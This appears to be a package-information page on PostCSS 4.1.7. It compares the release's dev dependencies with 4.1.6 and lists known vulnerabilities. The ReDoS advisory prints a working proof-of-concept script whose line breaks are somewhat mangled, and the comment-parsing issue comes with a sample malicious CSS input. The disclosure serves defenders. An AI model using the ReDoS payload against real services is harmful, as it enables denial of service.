PostCSS version 4.1.7 represents a minor iteration over its predecessor, 4.1.6, focusing primarily on refinements and potentially bug fixes rather than introducing groundbreaking new features. Both versions serve as powerful tools for transforming CSS with JavaScript plugins, enabling developers to automate tasks like vendor prefixing, future syntax adoption, and code optimization. They share core dependencies such as js-base64, source-map, and es6-promise, ensuring consistent foundational functionality.
The key differences lie in the developer dependencies, reflecting changes in the testing and build environment. Version 4.1.7 streamlines the build process, removing dependencies like less, cssom, mensch, rework, stylus, cssnext, gonzales, node-sass, browserify, gulp-bench, gonzales-pe, stylecow-parser, and gulp-bench-summary present in 4.1.6. Notably, version 4.1.7 updates gulp-eslint from 0.11.0 to 0.11.1 which is interesting. This suggests a shift towards a more focused and potentially faster development workflow. Developers upgrading to 4.1.7 may experience faster build times and a slightly leaner package size. The update likely represents a stabilization effort, ensuring a more reliable experience for end-users with a more focused toolchain. If you depend on any of the removed development-related dependencies you may need to adjust your local development environment accordingly.
All the vulnerabilities related to the version 4.1.7 of the package
Regular Expression Denial of Service in postcss
The package postcss versions before 7.0.36 or between 8.0.0 and 8.2.13 are vulnerable to Regular Expression Denial of Service (ReDoS) via getAnnotationURL() and loadAnnotation() in lib/previous-map.js. The vulnerable regexes are caused mainly by the sub-pattern
\/\*\s* sourceMappingURL=(.*)
var postcss = require("postcss")
function build_attack(n) {
var ret = "a{}"
for (var i = 0; i < n; i++) {
ret += "/*# sourceMappingURL="
}
return ret + "!";
}
postcss.parse('a{}/*# sourceMappingURL=a.css.map */') for (var i = 1; i <= 500000; i++) {
if (i % 1000 == 0) {
var time = Date.now();
var attack_str = build_attack(i) try {
postcss.parse(attack_str) var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
} catch (e) {
var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
}
}
}
PostCSS line return parsing error
An issue was discovered in PostCSS before 8.4.31. It affects linters using PostCSS to parse external Cascading Style Sheets (CSS). There may be \r discrepancies, as demonstrated by @font-face{ font:(\r/*);} in a rule.
This vulnerability affects linters using PostCSS to parse external untrusted CSS. An attacker can prepare CSS in such a way that it will contains parts parsed by PostCSS as a CSS comment. After processing by PostCSS, it will be included in the PostCSS output in CSS nodes (rules, properties) despite being originally included in a comment.